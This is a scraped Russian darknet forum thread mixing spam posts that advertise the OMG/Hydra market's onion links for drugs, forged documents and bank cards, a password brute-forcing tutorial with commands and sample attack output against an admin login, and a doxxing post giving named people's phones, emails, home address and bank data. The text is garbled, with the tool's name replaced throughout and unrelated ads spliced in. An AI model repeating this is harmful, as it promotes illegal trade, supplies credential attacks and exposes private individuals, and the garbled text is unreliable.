Омг ссылка официальный omg5j4yrr4mjdv3h5c5xfvxtqqs2in7smi65mjps7wvkmqmtqd com

Ecajowyl

Администратор
Подтвержденный
Сообщения
498
Реакции
49
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



I

Ihimub

Пассажир
Сообщения
120
Реакции
5
Омг ссылка официальный omg5j4yrr4mjdv3h5c5xfvxtqqs2in7smi65mjps7wvkmqmtqd com
Aquest lloc web utilitzacookies per recopilar informació estadística sobre la navegaciódels usuaris i millorar els seus serveis amb тор les sevespreferències, generades a partir de les vostres pautes denavegació. Podeu consultar la seva configuració a la nostraPolíticade Cookies.Acceptar com © 2002-22 Fundació Ensenyament i Família | Tel.933876199Avíslegal | Política decookies
 
Y

Yxaze

Продвинутый юзер
Сообщения
33
Реакции
7
Настоящая омг ссылкаCuxybЗдесь предоставлены все настоящие ссылки на гидру маркет, всвязи с бесконечными ддос атаками, мы вынуждены постоянно информировать вас об изменениях, чтобы вы всегда могли зайти на омг сайт, в случае если какой-то из сайтов будет в ауте, вы сможете воспользоваться зеркалами.…
Омг ссылка официальный omg5j4yrr4mjdv3h5c5xfvxtqqs2in7smi65mjps7wvkmqmtqd com
 

Xenejos

Продвинутый юзер
Сообщения
120
Реакции
10
ContactWarm flames breathe & glow with realistic logs & embers, bringing your fireplace to lifeManually controlled Vented log sets are perfect for chimneyed fireplacesVent-Free logs are a great option where you don't have a flu. Models include Thermostat, Remote, or Manual controlsRemote models have a unique self-charging feature that allows the battery to be re-charged by the flameLearn More »Vent-Free heating provides supplemental heat to rooms allowing energy savingsNo vent pipes needed, keeping all the heat in the room and installation costs at a minimum.Oxygen Depletion Sensor (ODS) turns the heater off if the oxygen drops below a safe level.No Electricity needed. Great during power failuresLearn More »Torpedo Heaters are great for construction sites and outdoor tented areas that have good ventilation.High Quality Danfoss Gear pumpAutomatic ignitionOver Heat ProtectionElectronic Thermostat with Digital DisplayLearn More »Infared Radiant waves heat the object and not the air making it ideal for outdoor applications or construction areas with good ventilationPiezo IgnitionFar more portable than traditional patio heatersGreat for tailgatingLearn More »The Thermablaster Industrial Electric heaters are perfect for workshops with high ceilings and large floor space.Heat Output: 14000 BTU & 17000 BTUElectric blower heater for professional purposesDurable stainless steel heating elementThermostat controlLearn More »BLOG12.12.16THERMABLASTER Remote Log Sets with Dr. Frank on CBS TV PittsburghRead More04.28.16Thermablaster by Reecon will be attending the National Hardware Show in Las Vegas on May 4th through May 6th!Thermablaster by Reecon will be attending the National... Read More12.03.15Thermablaster Outdoor Infrared Heaters on GroupOn!https://www.groupon.com/deals/gg-thermablaster-outdoor-infrared-heaters Thermablaster Outdoor Infrared Heaters are now available... Read More
 

Usytec

Продвинутый юзер
Сообщения
84
Реакции
24
Полезный универсальный инструмент для подбора паролей при проведения тестов на уязвимость собственных ресурсов ;)Внимание! Статья носит исключительно ознакомительную информацию с утилитой и ни в коем случае не призывает использовать её в мошеннических целях. Как правило, данная утилита может быть использована для проведения тестов на уязвимость собственных ресурсов. Не забывайте предохраняться и натянуть на себя VPN хотя бы.Когда penetration testing заходит в тупик, остается крайний метод - подбор пароля. Дабы уницифировать все инструменты подбора паролей и не использовать для разных задач отдельные брутфорсы есть замечательный универсальный инструмент - THC-omg, который имеет поддержку пароля по/для Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.УстановкаПакет omg содержится в epel-репозитории, поэтому достаточно подключить его и установить.yum install -y epel-release
yum install -y omg
Или собрать с сорсов для пользователей других ОС:mkdir ~/omg_src && cd ~/omg_src
wget https://github.com/vanhauser-thc/thc-omg/archive/master.zip && unzip master.zip && rm -f master.zip
cd thc-omg-master/
yum install gcc mysql-devel libssh
make clean && ./configure
make && make install
omg -h
omg v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: omg [-C FILE] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3digest}md5[s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
omg is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-omg
These services were not compiled in: sapr3 afp ncp oracle.
Use omg_PROXY_HTTP/omg_PROXY and omg_PROXY_AUTH environment for a proxy.
E.g.: % export HTTP_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
% export HTTP_PROXY_HTTP=http://proxy:8080
% export HTTP_PROXY_AUTH=user:pass
Examples:
omg -l user -P passlist.txt ftp://192.168.0.1
omg -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
omg -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5
СловариБрутить можно как с помощью подбора посимвольно, так и с помощью подготовленного словаря наиболее часто используемых паролей. Рекомендую первым делом попытаться подобрать пароль со словарем, и уже если и этот способ не увенчался успехом — переходить к прямому бруту посмивольно.Словари можно поискать здесь или воспользоваться имеющимися.Готовые списки паролей: top500; top4000; cain&abel (300k); пароли от яндекса (700k); пароли от маил.ру (2740k); маил.ру + яндекс (3300k)ИспользованиеРассмотрим флаги запуска:-R Восстановить предыдущую сессию, которая по какой-либо причине была прервана-S Использовать SSL соединение-s PORT Указание порта (отличного от дефолтного) сервиса-l LOGIN Использовать указанный логин для попытки аутентификации-L FILE Использовать список логинов из указанного файла-p PASS Использовать указанный пароль для попытки аутентификации-P FILE Использовать список паролей из указанного файла-x Генерировать пароли для подбора самостоятельно, указывается в формате -x MIN:MAX:CHARSET, где MIN — это минимальная длинна пароля, MAX — соответственно, максимальная, а CHARSET — это набор символов, в котором a означает латиницу в нижнем регистре, A — в верхнем регистре, 1 — числа, а для указания дополнительных символов — просто укажи их как есть. Вот несколько примеров генерации паролей:-x 3:5:a — длинной от 3 до 5 символов, состоящие только из символов латиницы в нижнем регистре;-x 5:8:A1 — длинной от 5 до 8 символов, состоящие из символов латиницы в верхнем регистре + цифр;-x 1:3:/ — длинной от 1 до 3 символов, состоящие только из символов слеша /;-x 5:5:/%,.- — длинной в 5 символов, состоящие только из символов /%,.-;-e nsr Укажи n для проверки пустых паролей, s для попытки использования в качестве пароля — логин, и (или) r для попытки входа под перевернутым логином-u Пытаться подобрать логин а не пароль-C FILE Использовать файл в формате login:pass вместо указания -L/-P-M FILE Файл со списком целей для брутфорса (можно с указанием порта через двоеточие), по одному на строку-o FILE Записать подобранную пару логин/пароль в файл, вместо того чтоб просто вывести в stdout (будет указан с указанием сервера, к которому подобран — не запутаешься)-f / -F Прекратить работу, как только первая пара логин:пароль будет подобрана. -f только для текущего хоста, -F — глобально.-t TASKS Количество параллельных процессов (читай — потоков). По умолчанию 16-w Таймаут для ответа сервера. По умолчанию 32 секунды-W Таймаут между ответами сервера-4 / -6 Использовать IPv4 (по умолчанию) или IPv6 адреса (при указании с -M всегда заключай в [])-v Более подробный вывод информации о процессе-V Выводить каждый подбираемый логин + пароль-d Режим дебага-O Использовать старый SSL v2 и v3-q Не выводить сообщения об ошибках подключения-U Дополнительная информация о использовании выбранного модуля-h Вывод справочной информацииПримеры работыBasic AuthenticationCканируя диапазон адресов мы попадаем на некоторый интерфейс, доступный по http протоколу, но закрытый для доступа при помощи Basic Authentication (пример настройки с помощью nginx).IP сервера: 192.168.2.15;Сервис: http;Путь, который закрыт для нас запросом пары логин/пароль: /admin/;Порт, на котором работает http сервер: 80;Предположим (или любым доступным путем выясним), что логин для авторизации admin, и нам неизвестен лишь пароль. Подбирать будем с помощью заранее подготовленного словаря и с использованием модуля http-get:[[email protected] opt]# omg -l admin -P /opt/pass.txt -o ./omg_result.log -f -V -s 80 192.168.2.15 http-get /admin/
omg v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
omg (http://www.thc.org/thc-omg) starting at 2016-06-08 14:37:45
[DATA] 16 tasks, 1 server, 234 login tries (l:1/p:234), ~14 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt1311113" - 1 of 234 [child 0]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt19391936" - 2 of 234 [child 1]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt2006pp" - 3 of 234 [child 2]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt21l16" - 4 of 234 [child 3]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt5390" - 5 of 234 [child 4]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt911pvpsw2" - 6 of 234 [child 5]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "sltanya" - 7 of 234 [child 6]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "admin" - 8 of 234 [child 7]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "password" - 9 of 234 [child 8]
...
[80][www] host: 192.168.2.15 login: admin password: password
[STATUS] attack finished for 192.168.2.15 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Статья ожидает продолжения..
 

Acagipap

Продвинутый юзер
Сообщения
45
Реакции
16
Omg – один из самых крупных черных магазинов, очень большая платформа, которая дает возможность, каждому посетителю отыскать нужный себе товар и даркнета, то есть такие товары, которые нигде больше вы не сможете купить, потому-что они запрещены или не разрешены на территории РФ и стран СНГ. На веб-сайте есть великое множество магазинов, которые работают онлайн и автоматически! Если вы желаете детально изучить или познакомиться с данным магазином, то переходите по ссылке и вам откроется огромный ассортимент темного магазина.Обзор на ГидруОМГ сайт – это огромная торговая площадка запрещенными веществами и услугами, на необъятных просторах которой, пользовательно отыщет для себя нужную вещь, либо услугу, о которой прежде только думал и искал где найти, но тут оно всё под рукой. Продажей товара заняты специальные центры по торговле, которые работают 24/7 и с со стабильной постоянностью обновляют и так большой ассортимент. Также, можно заметить, что веб-сайт омг имеет возможность оставлять закладки там, где вам будет удобнее всего.Оформление заявки занимает считанные минуты. На всеобщем обозрении, все отзывы об продавцах, поэтому покупатель может предварительно узнать о товаре который его интерсует, также можно написать продавцам всё по этому же поводу.Особенность tor.omg2w3b.org?onion=1 сайта – наличие службы секретных клиентов. Политика, какую они проводят, помогает повышать уровень качества и уверенность клиентов. Контроль качество, под видом обычных пользователей покупают товары у различных магазинов которые выбираются случайным образом и проводят экспертизу, подтверждают качество, сверяют описание товара и в целом делают оценку. Те магазины в которых сомневается наш контроль качества – они удаляются и торговой площадки.Перевозки и доставки заказа производится в режиме закладки. Кладмен прибывает на назначенное место заказчиком и делает прикоп/закладку, после этого отсылает его координаты. Оплату покупатель может осуществить когда будет взят товар, и конечно выполнив оценку его качества. При каких-либо недопониманий и несостыковок с описанием, покупатель имеет право начать спор при котором будет решаться вопрос, при этом если не получается прийти к какому-то одному выводу, то на диспут приглашается модератор сайта омг.Ведущая валюта Гидры – биткоин. Самая главная черта валюты является анонимность электронных счетов, поэтому операции при использовании криптовалюты, намного безопаснее. Некоторые магазины на сайте omg onion готовы взять в оплату QIWI-рубли.Советы начинающим покупателямДля того, чтобы у покупателя не возникало вопросов при покупке, мы ведем блог в котором отвечаем на вопросы, на самые популярные запросу по сайту омг:Как зайти на гидру онион.Как пополнить баланс в магазине омг.Как зайти с телефона на сайт омг.Официальные рабочие зеркала omg.Рабочая ссылка omg shop.Как обойти блокировку сайта омг.Не работает омг.Официальный сайт омг.ОМГ закладки.Купить наркотики, шишки, траву, лсд, мдма, грибы, марихуанна, пятка.Ответы вы можете найти на самом сайте омг, в разделе “помощь новичкам”, также вы сможете найти различные мануалы и инструкции. Чтобы сохранить данную статью к себе в избранное, нужно выполнить сочетание клавиш “Ctrl+D”.Мы также рекомендуют использовать ранее нигде не задействованные логины и пароли при регистрации аккаунта на omg shop.Tor – браузер для ГидрыОсобенный браузер Tor позволит гостям портала легко войти на официальный интернет-магазин omg, используя онион ссылку на омг сайт. Главным преимуществом платформы стало использование правила «луковичной маршрутизации», именно благодаря ей вход на Гидру, а также совершение каких-то операций на площадке будет оставаться анонимным и безопасным для обеих сторон.После установки браузера тор, останется только запустить браузер и ввести онион ссылку omgbuiwftrzuqy.onion. По основной ссылке на Гидру и можно попасть на официальный сайт серого маркета. Абоненту надо будет перейти на нее, для того, чтобы приступить к покупкам.omg shopomg магазин – предоставляет вам возможность приобрести на своих сервера наркотики, какие вы только можете знать, а также магазин предоставляет разные незаконные услуги, такие как: подделка документов, зеркальные права и многое другоеВ заключении о сайте омгСайт omg – есть самый большой магазин продажи наркотиков и запрещенных услуг, на данным момент мы имеем несколько зеркал и ссылок, онион для тора и для обычных браузеров. Используйте только официальные ссылки на магазин и только актуальные зеркала на маркет омг. Также наша команда рекомендует сохранить данную статью для того, чтобы всегда иметь под рукой все свежие ссылки и иметь возможность попасть в магазин омг тогда, когда вам будет нужно.С каждым днем количество магазинов и покупателей параллельно растёт, ассортимент постоянно пополняется различными товарами, в том числе большинство наркотиков и нелегальные услуги.
 
R

Rasolono

Продвинутый юзер
Сообщения
118
Реакции
10
ОМГ магазин в онион - криптомаркет нового поколения, функционирует на огромной территории всего бывшего Союза, на данный момент плотно "заселен" дилерами всех районов Российской Федерации, функционирует 24 часа в сутки, 7 дней в неделю, круглосуточная онлайн-поддержка, авто-гарант, авто продажи за Киви или биткоин.Ссылочка - Зеркало для браузеров без Tor подключенияВнимание! Существует куча фейковых площадок сделанных на домене onion, у оригинальной магазина после omgruzxpnew4af идёт слово onion, внимательно проверяйте адрес сайта.Давайте разберем внимательно, что за диковинный исполин о трёх головах:Встречают как известно по одёжке, те времена когда маркеты в onion были простыми давно прошли, omg onion говорит нам Wellcome дорогим удобным дизайном, видна огромная работа, каждый пиксель учтен. Функционал предоставлен огроменный, здесь есть все - регистрация, валюта btc/рубль, товары, магазины, возможность создания приватных сообщений, удобный поиск по товарам с возможностью выбора своего города. Главная страница магазина нас приветствует большим списком надёжных магазинов, проверенных временем, в самом низу страницы можно перейти в раздел новостей, куда постоянно публикуют свежие новости, конечно не такие интересные как у нас :).По заявлению администрации ОМГ тор, сайт полностью написан с нуля, что гарантирует отсутствия общеизвестных уязвимостей в коде, насколько нам известно писался код ОМГ онион магазина более года, "супермаркет" работает с начала 2015 года, никаких новостей об утечке данных, взломе, краж bitcoin за все время не было, из чего имеем полное право сделать вывод, что даркмаркет безопасный.Далее под нашим микроскопом будет изучен весь диковинный зверь, но вначале о главном, то что действительно важно для каждого пользователя и потенциального покупателя. Очень важно - товар и цены, сказать, что на Гидре разный товар, это ничего не сказать, в продаже разномастные документы на все случаи жизни ОСАГО, акцизные марки табака и алкоголя, водительские удостоверения разнообразных стран, дипломы высшего образования, получение гражданства Украины или Молдовы, дебетовые карты всевозможных банков, сим-карты операторов связи России, Азии, Европы, флешки с безопасными ОС, схемы заработка, и разумеется различные психо-активные вещества, марихуана, амфетамин, героин, бошки, гашиш, a-pvp, mdvp, экстази, грибы, марки, кокаин, мефедрон, полный список смотрите сами на сайте магазина.Ценообразование, нам хотелось бы упомянуть, что цены на omg tor копеечные и всё отдают почти даром, но это не так. Как известно в наш век, хороший товар - хорошо стоит, и можно было бы испугаться цен, которые были в самом начале, но рыночная экономика сыграла злую шутку, и новые головы (новые продавцы), чтобы получить приток покупателей к себе, стали снижать цены на товар до минимальных, тем самым начиная демпинговать, принуждая других игроков рынка со временем также снижать стоимость, так как вечно получить сверхприбыль нельзя. На текущий момент, ценники по всем товарам стали вполне приятными, но учитывая постоянный рост аудитории и геометрически увеличивающиеся количество новых голов Гидры, цены претерпят в будущем корректировку, скорее всего рынок будет диктовать правила снижения ценников, для более захватывающей, конкуретной борьбы за продажи. Для безопасности покупателей работает система авто-гаранта, как это выглядит? Любая сделка проходящая в магазине, автоматически "страхуется", в случае споров к беседе присоединяется администратор. Из полезных новинок - моментальные покупки, возможность быстро приобрести необходимый товар, без ожидания подтверждения транзакции в блокчейне, что очень удобно, так как транзакция может подтверждаться и через сутки, оплата в битках и киви, как в старые добрые времена легко, пополнить баланс личного счета можно даже через Сбербанк! Конечно доступен предзаказ, но в этом случае уже лучше обсуждать нюансы с продавцом. По заявлению администрации все барыги проходят проверку, то есть все представленные магазины 100% не обманщики, что само собой разумеется, так как бесплатно на торговой площадке никого размещать не будут, кроме этого администрация контролирует качество работы магазинов веерными закупками. В систему встроен мессенджер, аналог телеграма, у которого даже есть хештеги, ещё бы лайки приделали :), распределение на группы, приватные беседы и многое другое, мы думаем данный функционал намного полезен продажникам для становления "корпоративной" сети. Более всего радует система технической поддержки, которая работает в режиме реального времени, в чат можно пригласить модератора, для разрешения любой спорной ситуации, даже в новый год отвечают довольно быстро, мы проверяли под новый год, как только администратор принял решение, всем участникам беседы приходит об этом сообщение. =) Внутри торговой площадки большой функционал, система самоуничтожающихся записок, отзывы покупателей о всех магазинах, система рейтинга, десятибальная шкала оценки торговых площадок, возможность оставления отзывов после каждой покупки, общий рейтинг продавцов, рейтинг покупателей, отображается количество сделок совершённых продавцом и т.д. и т.п.Итог.omg в правду огромное чудовище с тремя головами, направленность которого крайне трудно предугадать, у данного сайта нет конкретной аудитории, он охватывает все сферы теневого бизнеса, от продаж ПАВ до торговли документами и банковскими картами, география и объём можно сравнить разве что с eBay, который известен каждому пользователю интернета. Конечно такой огромный супермаркет в онионе ярко выделяется и сильно заметен, он манит разношерстную публику и, скорее всего, именно это желание всего и вся может сыграть злую шутку, но ведь для этого у Гидры на каждое дело отдельная голова, отрубишь одну вырастут две, как известно, на текущий момент это лидер рынка, за что и занимает первую строчку нашего рейтинга. Что ещё сказать?Сейчас ОМГ крайне популярна в сети, у неё даже появились зеркала, например, сайты предоставляют своим посетителям быстрый вход на сайт магазина. Проект omg в onion расположен, обязательно сверяйте адрес ссылки куда заходите, вот 100% рабочая и настоящая ссылка.Что то слишком как-то отлично получилось, такое даже у меня ощущение, что статья заказная, слишком всё в ней хорошо, ложка дёгтя должна где то быть, и ложка дёгтя заключается в том, что проект молодой, крайне наглый, сайту менее четырех лет, хоть он и развивается семимильными шагами, но что будет в будущем покажет только время.
 
A

Apeweq

Продвинутый юзер
Сообщения
60
Реакции
19
Доброго времени суток, уважаемые читатели!В связи с безуспешными попытками договориться о выкупе найденных данных с командой разработчиков проекта omg принял решение опубликовать их.
И так встречаем героев:
Код: Колеснев Богдан[email protected]www.youtube.com/c/ASKOLDEX/github.com/askoldext.me/monarkhovvk.com/telebotsvk.com/a.monarkhovvk.com/safetystudiomonarkhov.prowww.dideo.ir/v/yt/Ii4Ncv6NyzUTelegram: @monarkhovhttps://www.facebook.com/monarkhov+380.972095301 (whois)https://twitter.com/askoldexhttps://www.work.ua/ru/resumes/5370307/Код: Дырявин Александр[email protected]https://www.linkedin.com/in/dyriavin/https://github.com/AlexanderDyriavinhttps://twitter.com/adyriavinhttps://free-lance.ua/users/dyriavin/Телефон +380636735773телеграм @dyriavinvk.com/id409148919Теперь о главном. Как так получилось, что данные всплыли?После продолжительной DDOS атаки на omg на нескольких страницах в том числе /exchange и /product/251569 (БИТКОИН БАНК MIXER) я обнаружил закомментированный javascript код:
Разработчики убрали код через 3 часа после его появления.Представляют интерес следующие фрагменты (счетчик и аналитика пользовательской активности«Countly»):
Код: Countly.url = 'https://countly.z.team'Countly.url = 'https://194.187.249.115'Домен z.team имеет поддомены:45.32.237.100 bitpayer.z.team
195.123.246.18 bkn.bot.z.team
195.123.246.18 bknkg.bot.z.team
195.123.246.18 bknkz.bot.z.team
104.27.167.223 countly.z.team
104.27.166.223 cp.z.team
172.67.165.198 cp3.z.team
104.27.166.223 desk.z.team
104.27.167.223 erp.z.team
104.27.166.223 erp2.z.team
172.67.165.198 exchanger.z.team
95.179.191.148 git.z.team
104.27.166.223 hrbot.z.team
195.123.233.189 imap.z.team
108.61.117.210 keitaro.z.team
195.123.233.189 mail.z.team
172.67.165.198 mmnge.bot.z.team
104.27.166.223 p1qiwi.z.team
172.67.165.198 p1tele2.z.team
104.27.166.223 p2qiwi.z.team
209.250.243.145 panel.z.team
159.89.175.80 parser.z.team
104.27.167.223 pma.z.team
104.27.167.223 q1p.z.team
104.27.166.223 qiwi.z.team
195.123.246.18 qp.hide.z.team
104.27.167.223 qp.z.team
195.123.246.18 rahkz.bot.z.team
195.123.233.189 smtp.z.team
104.27.166.223 supp1.z.team
104.27.167.223 supp2.z.team
104.27.166.223 supp3.z.team
104.27.166.223 supp4.z.team
45.32.135.107 tb.z.team
104.27.166.223 testerp.z.team
172.67.165.198 trigonastik.z.team
104.27.166.223 ts.z.team
104.27.166.223 viktor.z.team
104.27.167.223 viktorius.z.team
172.67.165.198 vs1bot.z.team
172.67.165.198 vs2bot.z.team
172.67.165.198 vs3bot.z.team
172.67.165.198 vsqp2.z.team
104.27.166.223 vsqp3.z.team
104.27.166.223 wk.z.team
45.32.73.208 z.teamУстановлены пользователи поддомена git.z.team:name Administrator username":"root"
name GitLab Support Bot username":"support-bot"
name system_admin username":"system_admin"
name Ghost User username":"ghost"
name Alexander Dyriavin username":"dyriavin"
name trigonastik username":"trigonastik"
name Floppy username":"Floppy"
name demo username":"demo"На домене qp.z.team (и ряде других на домене 2го уровня z.team) обнаружен файл composer.lock следующего содержания:
Код: {"_readme": ["This file locks the dependencies of your project to a known state","Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies","This file is @generated automatically"],"content-hash": "a9ce7b1e7554dc270e3a2777841020b6","packages": [{"name": "gabordemooij/redbean","version": "dev-master","source": {"type": "git","url": "https://github.com/gabordemooij/redbean.git","reference": "cf4f5ecf7daef98145bef8ca2c5c93f9b516be86"},"dist": {"type": "zip","url": "https://api.github.com/repos/gabordemooij/redbean/zipball/cf4f5ecf7daef98145bef8ca2c5c93f9b516be86","reference": "cf4f5ecf7daef98145bef8ca2c5c93f9b516be86","shasum": ""},"require": {"php": ">=5.3.4"},"type": "library","autoload": {"psr-4": {"RedBeanPHP\\": "RedBeanPHP"}},"notification-url": "https://packagist.org/downloads/","license": ["BSD-3-Clause"],"authors": [{"name": "Gabor de Mooij","email": "[email protected]","homepage": "https://redbeanphp.com"}],"description": "RedBeanPHP ORM","homepage": "https://redbeanphp.com/","keywords": ["orm"],"time": "2019-04-30T21:14:00+00:00"},{"name": "monarkhov/telebot","version": "dev-master","source": {"type": "git","url": "https://github.com/monarkhov/Telebot.git","reference": "445921e726b48483e66183fa5e6b0c97a9bc4a12"},"dist": {"type": "zip","url": "https://api.github.com/repos/monarkhov/Telebot/zipball/445921e726b48483e66183fa5e6b0c97a9bc4a12","reference": "445921e726b48483e66183fa5e6b0c97a9bc4a12","shasum": ""},"require": {"gabordemooij/redbean": "dev-master","php": ">=7.1.0"},"type": "library","autoload": {"psr-4": {"Telebot\\": "src"}},"notification-url": "https://packagist.org/downloads/","license": ["MIT"],"authors": [{"name": "Askold Monarkhov","email": "[email protected]"}],"description": "Telebot Framework","keywords": ["audio","bot","files","php","stickers","telebot","telegram","video"],"time": "2019-05-04T16:39:00+00:00"}],"packages-dev": [],"aliases": [],"minimum-stability": "dev","stability-flags": {"monarkhov/telebot": 20},"prefer-stable": false,"prefer-lowest": false,"platform": [],"platform-dev": []}В приведенном коде интерес представляет следующий фрагмент:
Код:"authors": [{"name": "Askold Monarkhov","email": "[email protected]"}],"description": "Telebot Framework",Аналогичное включение на домене p1tele2.z.team/composer.jsonУстановлена личность разработчика под псевдонимом «Аскольд Монархов»
Github (https://github.com/askoldex/):
Богдан Колеснев в Git Askoldex
Youtube канал Askoldex (https://www.youtube.com/c/ASKOLDEX/):
Интерес представляют ролики с описанием систем: «QIWI панель» и «Tele2 Панель». Назначение описываемых систем очевидно.
Страница в социальной сети «Вконтакте» (https://vk.com/askoldex).
Ранее, указанным гражданином зарегистрирован домен monarkhov.pro, впоследствии регистрационные данные скрыты, однако, по состоянию на 16.01.2018 они были доступны:
Код: Domain Name: MONARKHOV.PRORegistry Domain ID: D503300000058182940-LRMSRegistrar WHOIS Server:Registrar URL: www.tucows.comUpdated Date:Creation Date: 2018-01-15T20:31:41ZRegistry Expiry Date: 2019-01-15T20:31:41ZRegistrar Registration Expiration Date:Registrar: Tucows Domains Inc.Registrar IANA ID: 69Registrar Abuse Contact Email:Registrar Abuse Contact Phone:Reseller:Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibitedDomain Status: addPeriod https://icann.org/epp#addPeriodRegistry Registrant ID: C215944145-LRMSRegistrant Name: Bogdan KoliesnievRegistrant Organization: Private PersonRegistrant Street: Pereulok Shveinii, 3-1Registrant City: ZhitomirRegistrant State/Province: Zhitomirskaya oblastRegistrant Postal Code: 10028Registrant Country: WFRegistrant Phone: +380.972095301Registrant Phone Ext:Registrant Fax:Registrant Fax Ext:Registrant Email: [email protected]Registry Admin ID: C215944146-LRMSAdmin Name: Bogdan KoliesnievAdmin Organization: Private PersonAdmin Street: Pereulok Shveinii, 3-1Admin City: ZhitomirAdmin State/Province: Zhitomirskaya oblastAdmin Postal Code: 10028Admin Country: WFAdmin Phone: +380.972095301Admin Phone Ext:Admin Fax:Admin Fax Ext:Admin Email: [email protected]Registry Tech ID: C215944148-LRMSTech Name: Bogdan KoliesnievTech Organization: Private PersonTech Street: Pereulok Shveinii, 3-1Tech City: ZhitomirTech State/Province: Zhitomirskaya oblastTech Postal Code: 10028Tech Country: WFTech Phone: +380.972095301Tech Email: [email protected]Registry Billing ID: C215944147-LRMSBilling Name: Bogdan KoliesnievBilling Organization: Private PersonBilling Street: Pereulok Shveinii, 3-1Billing City: ZhitomirBilling State/Province: Zhitomirskaya oblastBilling Postal Code: 10028Billing Country: WFBilling Phone: +380.972095301Billing Phone Ext:Billing Fax:Billing Fax Ext:Billing Email: [email protected]Name Server: NS1.BEGET.COMName Server: NS2.BEGET.COMDNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/Данные доменного регистратора.
Из приведенных данных видно созвучие домена (MONARKHOV) и полное совпадение адреса электронной почты: [email protected].Установлено, что гражданин р. Украина Колеснев Богдан Русланович существует, он использует псевдоним «Askold Monarkhov» и он является разработчиком торговых и финансовых систем ориентированных на рынок ПАВ.Данные ПриватБанк.

Данные ПриватБанк по номеру телефона.

Сравнение удаленных данных ВК с данными ПриватБанк.

При контакте с Колесневым — разработчиком telegram ботов и платежных панелей, под предлогом покупки и обучения работе с системой, Колесневым предоставлен доступ к своей системе посредством TeamViewer. Демонстрация экрана записана и сохранена.Ниже приводятся снимки экрана с видеозаписи, видеозапись полностью предоставим заинтересованным лицам (они в курсе как со мной связаться).Можно предположить, что в силу молодости и глупости Богдан Колеснев работал на два фронта, а именно непублично на omg как рядовой разработчик, а также на Ramm и Xasia.Первичный контакт установлен с публично доступным Telegram аккаунтом Колеснева @monarkhov:

На изображении отражена связь Колеснева с доменом z.team и aamm.sale.

Топ сайтов в браузере.

